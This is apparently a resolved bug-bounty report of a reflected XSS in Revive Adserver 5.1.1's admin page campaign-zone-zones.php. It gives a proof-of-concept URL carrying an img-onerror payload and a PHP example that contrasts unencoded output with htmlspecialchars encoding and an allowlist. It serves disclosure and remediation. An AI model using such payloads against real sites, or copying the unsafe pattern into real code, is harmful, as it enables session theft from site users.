Reflected XSS on /admin/campaign-zone-zones.php
Medium
## Vulnerability Details
I found a reflected XSS attack on `/admin/campaign-zone-zones.php`.
Revive-Adserver version is `revive-adserver-5.1.1`.
- Go to `http://revive-adserver.loc/admin/campaign-zone-zones.php?_=&clientid=1&campaignid=1&status=available%22%3E%3Cimg%20src=1%20onerror=alert(document.domain)%3E&text=`
- Malicious code executed
{F1187355}
Rendered response from server:
{F1187356}
## Impact
With this vulnerability, an attacker can, for example, steal users' cookies or redirect users to a malicious website.
Report Stats
- Report ID: 1097979
- State: Closed
- Substate: resolved
- Upvotes: 7
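The payload in the report closes a double-quoted HTML attribute with `">` and then opens a new tag, so the defence is to encode the `status` value for the attribute context and to restrict it to known values. The following is an added example, not Revive Adserver source code: the function names, the `<input>` markup and the allowlist value `linked` are assumptions made for illustration.

```php
<?php
// Added illustration; not code from Revive Adserver.
// Constructed input: the URL-decoded `status` value from the report's request.
$status = 'available"><img src=1 onerror=alert(document.domain)>';

// The pattern that produces the reported behaviour: a request value is
// concatenated unencoded into a double-quoted attribute.
function render_unsafe(string $status): string
{
    return '<input type="hidden" name="status" value="' . $status . '">';
}

// Fix 1: encode for the HTML attribute context at the point of output.
// ENT_QUOTES encodes both " and ', so the value cannot end the attribute;
// < and > are encoded as well, so no new tag can start.
function render_encoded(string $status): string
{
    $safe = htmlspecialchars($status, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="status" value="' . $safe . '">';
}

// Fix 2 (defence in depth): accept only expected values of the parameter.
// The allowlist contents are hypothetical; "available" is the only value
// shown in the report.
function normalize_status(string $status, array $allowed = ['available', 'linked']): string
{
    return in_array($status, $allowed, true) ? $status : $allowed[0];
}

// Unencoded: the attribute is closed early and an <img> element is emitted.
echo render_unsafe($status), "\n";

// Encoded: the whole value stays inside the attribute as inert text.
echo render_encoded($status), "\n";

// Validated, then encoded: the unexpected value falls back to the default.
echo render_encoded(normalize_status($status)), "\n";
```

Encoding at output is the primary fix because it holds even when the set of valid values changes; the allowlist only narrows what reaches the template.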